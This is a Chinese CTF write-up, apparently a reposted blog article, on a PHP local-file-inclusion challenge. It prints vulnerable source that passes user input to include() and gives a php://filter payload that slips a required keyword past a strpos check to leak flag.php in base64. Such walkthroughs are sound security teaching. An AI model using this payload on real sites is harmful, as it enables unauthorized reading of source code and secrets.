这道题先用php://filter/convert.base64-encode/resource=index(这道题不带后缀名)读取出index.php的源码:
<?php
$file = $_GET['category'];
if(isset($file))
{
if( strpos( $file, "woofers" ) !== false || strpos( $file, "meowers" ) !== false || strpos( $file, "index")){
include ($file . '.php');
}
else{
echo "Sorry, we currently only support woofers and meowers.";
}
}
?>
</div>
<form action="index.php" method="get" id="choice">
<center><button onclick="document.getElementById('choice').submit();" name="category" value="woofers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Woofers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button>
<button onclick="document.getElementById('choice').submit();" name="category" value="meowers" class="mdl-button mdl-button--colored mdl-button--raised mdl-js-button mdl-js-ripple-effect" data-upgraded=",MaterialButton,MaterialRipple">Meowers<span class="mdl-button__ripple-container"><span class="mdl-ripple is-animating" style="width: 189.356px; height: 189.356px; transform: translate(-50%, -50%) translate(31px, 25px);"></span></span></button></center>
</form>
strpos()函数的意思是查当前字符串第一次出现的位置,返回结果就是要查的字符串前面有几个字符。
很明显,这道题要求get传参里有woofers、meowers、index然后进行文件包含
重点是伪协议可以嵌套协议:/index.php?category=php://filter/convert.base64-encode/index/resource=flag
知识点:
1.strpos()函数返回要查询的字符串前面有几个字符
2.?file=php://filter/convert.base64-encode/resource=flag.php 在文件包含漏洞中,传参传这个就相当于传了要读取的文件名是lag.php
3.?file=php://filter/convert.base64-encode/resource=flag.php 在/convert.base64-encode/和/resource=flag.php之间可以添加任何字符,不影响,比如这道题传参必须有woofers、meowers、index,就把这三个里的任意一个传过去,就可以得到flag.php的文件内容base64编码后的值了
原创文章,作者:kepupublish,如若转载,请注明出处:https://blog.ytso.com/273096.html